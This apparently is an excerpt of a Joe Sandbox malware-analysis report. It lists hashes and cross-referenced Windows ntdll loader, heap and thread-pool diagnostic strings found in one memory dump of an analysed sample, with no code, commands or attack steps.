                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                        • API String ID: 0-475462383
                                                                                                                                                                                                        • Opcode ID: dc8904af53e07cc3964dd6604a26c161a712a4cd6921b6b5a98fb198fac575be
                                                                                                                                                                                                        • Instruction ID: f9a9e289f69158463468411061dba8d0d291b4077e91ef17bd3a32a8c0485b66
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc8904af53e07cc3964dd6604a26c161a712a4cd6921b6b5a98fb198fac575be
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E31C4B16443069FC215EF2CD859E2AB7D5EF94B10F05055CF985EB391DA20EE04CBA3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 0182519B
                                                                                                                                                                                                        • Kernel-MUI-Language-SKU, xrefs: 0182534B
                                                                                                                                                                                                        • WindowsExcludedProcs, xrefs: 0182514A
                                                                                                                                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 01825272
                                                                                                                                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 01825167
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                        • API String ID: 0-258546922
                                                                                                                                                                                                        • Opcode ID: f2dda3657a3847f25a45fdd9e2dd3a2cf354946dfc50270081c2c3427903780c
                                                                                                                                                                                                        • Instruction ID: f06641ea72791ab4aa6ade23b2a51831bc6e9115b16530bb1a649bb8949e1e4a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2dda3657a3847f25a45fdd9e2dd3a2cf354946dfc50270081c2c3427903780c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3EF12C72D41229EBDB16DF98C980AEEBBBCFF19714F14406AE501E7210E7709F418B91
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                        • API String ID: 0-379654539
                                                                                                                                                                                                        • Opcode ID: 4cfcb0f5a937818602be7d605f0a002258a5b8b20b0d3b4e3b7e05992b0ca376
                                                                                                                                                                                                        • Instruction ID: a96858d6933c1ec436218e9a95d299ea91201596d5d9a3d62cc9790bc276a3d4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cfcb0f5a937818602be7d605f0a002258a5b8b20b0d3b4e3b7e05992b0ca376
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AEC1BC7410838ACFD76ACF58C880B6AB7E4FF84708F044969F986DB291E374CA45CB52
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01838341
                                                                                                                                                                                                        • @, xrefs: 018384B1
                                                                                                                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0183847E
                                                                                                                                                                                                        • LdrpInitializeProcess, xrefs: 01838342
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                        • API String ID: 0-1918872054
                                                                                                                                                                                                        • Opcode ID: 658b58b2f9f09fe36f1bb69e239ce3168ab0983f0281672da00b6fd7f5dc1f15
                                                                                                                                                                                                        • Instruction ID: 3551f4eff74f7756c131ae80b9a5f3b7dda84bbd5e034d873ab4e3ab337b97c1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 658b58b2f9f09fe36f1bb69e239ce3168ab0983f0281672da00b6fd7f5dc1f15
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85919D71148349AFD722DE65C880FABBBECAB85754F440A2DFA84D2151E734DA44CBA3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01860DEC
                                                                                                                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01860EB5
                                                                                                                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01860E72
                                                                                                                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01860E2F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                                        • API String ID: 0-1468400865
                                                                                                                                                                                                        • Opcode ID: b3fdcf3ad85f4b2204eb49914d3092f90e7daf6a7548f4554c7319985cdc49c7
                                                                                                                                                                                                        • Instruction ID: a965b703b0bb7a7cd99896ca292d9132ce0c9f10368a166d68146eabbcdfc154
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3fdcf3ad85f4b2204eb49914d3092f90e7daf6a7548f4554c7319985cdc49c7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A71F2719047099FCBA2EF18C880B9B7BA9AF95754F500568FD48CA186D734D284CB92
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
• API String ID: 2994545307-2586055223
• Opcode ID: 7e071f34b671519310c4674f10439b052447649da1a9de855ee75579c7d5685a
• Instruction ID: fe2d698f1930e60f0f989fa8bdde5dc0c0720c753876834676b2a6135b9b7085
• Opcode Fuzzy Hash: 7e071f34b671519310c4674f10439b052447649da1a9de855ee75579c7d5685a
• Instruction Fuzzy Hash: 3A61B3722446419FE722DB68CC45F67FBE9EF84B50F080499FA55CB391DA34EA04C762
Strings
• minkernel\ntdll\ldrinit.c, xrefs: 0186A7AF
• Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0186A79F
• LdrpDynamicShimModule, xrefs: 0186A7A5
• apphelp.dll, xrefs: 01822382
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-176724104
• Opcode ID: 9312bb0ad9ec65124d5d016e1699c02bc6932fddf6160ce8111a10859b63efb4
• Instruction ID: 5e3505fdf098b9bc16b445df02d2eaf7e59b995256758000a4590fea9be55554
• Opcode Fuzzy Hash: 9312bb0ad9ec65124d5d016e1699c02bc6932fddf6160ce8111a10859b63efb4
• Instruction Fuzzy Hash: 60314A72A00205AFEB35AF5DD885E6A77B9FB84B04F14006DE901F7355DB745B81CB50
Strings
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID: InitializeThunk
• String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
• API String ID: 2994545307-1391187441
• Opcode ID: 06e53baf4370a931ac4382539115a2edc73f4b7609f831effc1d967c35b421e2
• Instruction ID: b2dd0694f2c443935ad26e6a6b818c08c772c0819e5f23dbcae3c021f2c793e4
• Opcode Fuzzy Hash: 06e53baf4370a931ac4382539115a2edc73f4b7609f831effc1d967c35b421e2
• Instruction Fuzzy Hash: E831C172A00109EFDB11DB59CC88F9BFBB9EB447B4F144069FA15AB391D670EA40CA61
Strings
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: $ $0
• API String ID: 0-3352262554
• Opcode ID: 824a7fa24def9fce0deddfea47253ad5ea6275cfdf7f619a75bb5f0ecda9ee5c
• Instruction ID: 1c080853b1766a402edd228a8d70e12ed4e66eb0875d0c12d59e6b5548f359df
• Opcode Fuzzy Hash: 824a7fa24def9fce0deddfea47253ad5ea6275cfdf7f619a75bb5f0ecda9ee5c
• Instruction Fuzzy Hash: 7F3202B1A087858FE360CF68C484B5BBBE5BB88348F44492EF599C7251D774EA48CB52
Strings
• HEAP: , xrefs: 018014B6
• HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01801648
• HEAP[%wZ]: , xrefs: 01801632
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
• API String ID: 0-3178619729
• Opcode ID: 1a4c9ea64ea34c994cd942bc1d0befeb19c4c52d450b9d170b2ad59b6ce81124
• Instruction ID: 78679744cc6186243ad7c782806162d240edd7d085428a2a63d0c57622d34c47
• Opcode Fuzzy Hash: 1a4c9ea64ea34c994cd942bc1d0befeb19c4c52d450b9d170b2ad59b6ce81124
• Instruction Fuzzy Hash: 83E1E3306046499FDB6ACF6CC89967ABBF1FF44324F18845DE996CB286D734DA40CB50
Strings
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018700F1
• RTL: Re-Waiting, xrefs: 01870128
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018700C7
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
• Opcode ID: 3cead8e91bb08f9ef09acc8ea9dad1a971ba27d4f130e6139408b2799a20d1ce
• Instruction ID: 15e14fc741aed3c12ebc3c179f5bd9c4dae7b2da0dd3bb9f80fad15177802c01
• Opcode Fuzzy Hash: 3cead8e91bb08f9ef09acc8ea9dad1a971ba27d4f130e6139408b2799a20d1ce
• Instruction Fuzzy Hash: 2CE1AC706087419FD726CF28C844B1ABBF1BB45328F140A5DF6A5CB2E1D774DA84CB52
Strings
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
• API String ID: 0-1145731471
• Opcode ID: 27b72719a75f792ce3a99e60a97441c905ddb32053ef90ab406da3f6787a1916
• Instruction ID: 0a0a2a5bd5c9f809e55a8bac563649bc212662ad3597ffc6fd6c87174c0edc3d
• Opcode Fuzzy Hash: 27b72719a75f792ce3a99e60a97441c905ddb32053ef90ab406da3f6787a1916
• Instruction Fuzzy Hash: 2AB17C75A006098FDB26CF69C890BAEBBB9BF44714F188529ED15EB791D730EE40CB10
Strings
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: @$DelegatedNtdll$\SystemRoot\system32\
• API String ID: 0-2391371766
• Opcode ID: a9687db628bd234dfa9e0a225b58b55e5b50f01784b103674972d580b3a2ced8
• Instruction ID: 52428911f5a1af336b7a4e156e65344f1c57cdd2b902b623d9c8eb20f960808e
• Opcode Fuzzy Hash: a9687db628bd234dfa9e0a225b58b55e5b50f01784b103674972d580b3a2ced8
• Instruction Fuzzy Hash: 7AB17F71604345AFE322EF58D884F6BB7E8BB44B14F100929FE50DB291DB71EA448B92
Strings
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: FilterFullPath$UseFilter$\??\
• API String ID: 0-2779062949
• Opcode ID: f87caeb2b5cc017288392c1161dc1cf75f0fb38983cf5555e6a90e8c3c19cca5
• Instruction ID: fdd5a6c5b382b3a0865639d09db3cf5444ea2eb7b6e69ce443e097e1c4f466d3
• Opcode Fuzzy Hash: f87caeb2b5cc017288392c1161dc1cf75f0fb38983cf5555e6a90e8c3c19cca5
• Instruction Fuzzy Hash: A1A16B719016299BDB71DF28CC88BAAB7B8EF04714F1005EAEA09E7250DB359F85CF50
Strings
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
• API String ID: 0-318774311
• Opcode ID: b7b5f5a23a372b968f613dc98fc48029848be1f80e8369ce9a467dd3d30280ef
• Instruction ID: c090c68ca0057c084d3f54ee723b444c455a65b67b95de7a3e8c0a9938169ded
• Opcode Fuzzy Hash: b7b5f5a23a372b968f613dc98fc48029848be1f80e8369ce9a467dd3d30280ef
• Instruction Fuzzy Hash: 35819071248345AFEB21DB68D884B6ABBE8FF84754F080929FD51D7390DB74DA00CB52
Strings
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
• API String ID: 0-373624363
• Opcode ID: ec8d5046345d8722945ead9701ae6ed71cb421dc0f2ee4c1283b9eeaf80ba2d2
                                                                                                                                                                                                        • Instruction ID: edd9f7b3bba17a7366fec35d73380bbceff06eba83311dbcf994c922e5bd53e3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec8d5046345d8722945ead9701ae6ed71cb421dc0f2ee4c1283b9eeaf80ba2d2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2591AC35A0465DCBEB22CF58C8407AEBBB4FF01328F194199E915EB2D1D3799B80CB91
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • GlobalizationUserSettings, xrefs: 018DB3B4
                                                                                                                                                                                                        • TargetNtPath, xrefs: 018DB3AF
                                                                                                                                                                                                        • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 018DB3AA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                                                        • API String ID: 0-505981995
                                                                                                                                                                                                        • Opcode ID: 29efbfb660d51ec1c375c535d9f45447794a91c5115a3de7aa5e31979cc29d65
                                                                                                                                                                                                        • Instruction ID: 1258182e2970f621d88c5774b139024540e4ea8fb1fcb38ac9ec6877e10000a1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29efbfb660d51ec1c375c535d9f45447794a91c5115a3de7aa5e31979cc29d65
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03614072941329ABDB31DF58DC88B99B7B8AB15714F4101E9AA08E7250DB74DF84CF90
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                        • API String ID: 0-2283098728
                                                                                                                                                                                                        • Opcode ID: 2be08952adf5847c5555ce844c3b699fd4a5fd0bc91e0e8071cafbd447b0ee39
                                                                                                                                                                                                        • Instruction ID: bee2dbef6455a38bb76f33ec1222b342a2b86cb524c83e0bc8c1377a673c5536
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2be08952adf5847c5555ce844c3b699fd4a5fd0bc91e0e8071cafbd447b0ee39
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05512871B003329FD726EF3CC884B29B7A5BB94718F18062DE552C7295E7B49780CB92
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • HEAP: , xrefs: 0185E442
                                                                                                                                                                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0185E455
                                                                                                                                                                                                        • HEAP[%wZ]: , xrefs: 0185E435
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                                        • API String ID: 0-1340214556
                                                                                                                                                                                                        • Opcode ID: 80d52cdc257fc16d2e718b2156f6e5f65541a5b8c33605d88983a4092ed2ea6b
                                                                                                                                                                                                        • Instruction ID: 37e4df2832b17792c61abfca7759137caa99e614502dffff7f47ab6eb47f4c97
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80d52cdc257fc16d2e718b2156f6e5f65541a5b8c33605d88983a4092ed2ea6b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7051D332644685AFE712DBA8C884BAAFBF8FF05714F0440A9EA41CB752D774EB04CB51
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • LdrpCompleteMapModule, xrefs: 0186A39D
                                                                                                                                                                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 0186A396
                                                                                                                                                                                                        • minkernel\ntdll\ldrmap.c, xrefs: 0186A3A7
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                                        • API String ID: 0-1676968949
                                                                                                                                                                                                        • Opcode ID: ca9970e9771ceaf878f8bc4431a827a9fb47243cadc420b02a48a4aef3cee80b
                                                                                                                                                                                                        • Instruction ID: 7a6a114214653d3371f630174ac88ca9231ef7c5272e12fe386a7391878df2f4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca9970e9771ceaf878f8bc4431a827a9fb47243cadc420b02a48a4aef3cee80b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D51E8316007559BE727CF5CCA48B25BBE9BB04714F280194F952DB6D2D774EB80CB41
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                                                        • API String ID: 0-1151232445
                                                                                                                                                                                                        • Opcode ID: 339ae7c4ba72d2eed58cfbef9ad83b7cdda4441a3796120ab54ee41dc1e0217a
                                                                                                                                                                                                        • Instruction ID: 3470acf232138912a6f6d8a043821d60d863fed0964d1ba930598cf0dd8f65bb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 339ae7c4ba72d2eed58cfbef9ad83b7cdda4441a3796120ab54ee41dc1e0217a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6841E2342002808FEF6DDA1CC4D8BB7BBA1DF01345F2845ADDA86CB756CA65D645CB21
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • LdrpAllocateTls, xrefs: 0187194A
                                                                                                                                                                                                        • minkernel\ntdll\ldrtls.c, xrefs: 01871954
                                                                                                                                                                                                        • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 01871943
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                        • API String ID: 0-4274184382
                                                                                                                                                                                                        • Opcode ID: 336c5b589fb3c1a640ac14a37c4d77b80323cbdcb0992a166b79e51254fe86c2
                                                                                                                                                                                                        • Instruction ID: ddad457811d204251bf7fc8d479e746d8668fdb7e7e4bea2d5ba430fd0207cc3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 336c5b589fb3c1a640ac14a37c4d77b80323cbdcb0992a166b79e51254fe86c2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B416CB5A00209AFDB15DFA9DC45BADBBF5FF58704F084129E906E7255D734AA00CF90
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01884508
                                                                                                                                                                                                        • LdrpCheckRedirection, xrefs: 0188450F
                                                                                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01884519
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                        • API String ID: 0-3154609507
                                                                                                                                                                                                        • Opcode ID: 125af2986c63260ba46a9bd060ba00bec8ee6a0dcfd87761703f18513d28cd2b
                                                                                                                                                                                                        • Instruction ID: d5478d013255d3b1cb014cc3b39755dafd40b7d5c0b12c1d3f3ea6602c5009a7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 125af2986c63260ba46a9bd060ba00bec8ee6a0dcfd87761703f18513d28cd2b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD41D2336066139BCB21EF5CD880B26BBE4AF48754B0A066DFD58D7256E730EA00CB91
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Actx , xrefs: 018332CC
                                                                                                                                                                                                        • RtlCreateActivationContext, xrefs: 01872803
                                                                                                                                                                                                        • SXS: %s() passed the empty activation context data, xrefs: 01872808
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                                                                        • API String ID: 0-859632880
                                                                                                                                                                                                        • Opcode ID: b22668953249d461f37673a50851e7cd58328f69167a165f44232efb3fb95941
                                                                                                                                                                                                        • Instruction ID: 6560a4185dbc94aab61cd351861a6550d69ad9ac51d80983a5c479cbbeb9884c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b22668953249d461f37673a50851e7cd58328f69167a165f44232efb3fb95941
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D312372601209ABEB16DE58D890F9A7BE5FB94714F148428FD05DF382CB71DA45CBD0
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0188B2B2
                                                                                                                                                                                                        • @, xrefs: 0188B2F0
                                                                                                                                                                                                        • GlobalFlag, xrefs: 0188B30F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                                        • API String ID: 0-4192008846
                                                                                                                                                                                                        • Opcode ID: fa9b7d87cd77c95c493a9843c75faa9dbc833784f572b76ffa7f6c79c66c5e74
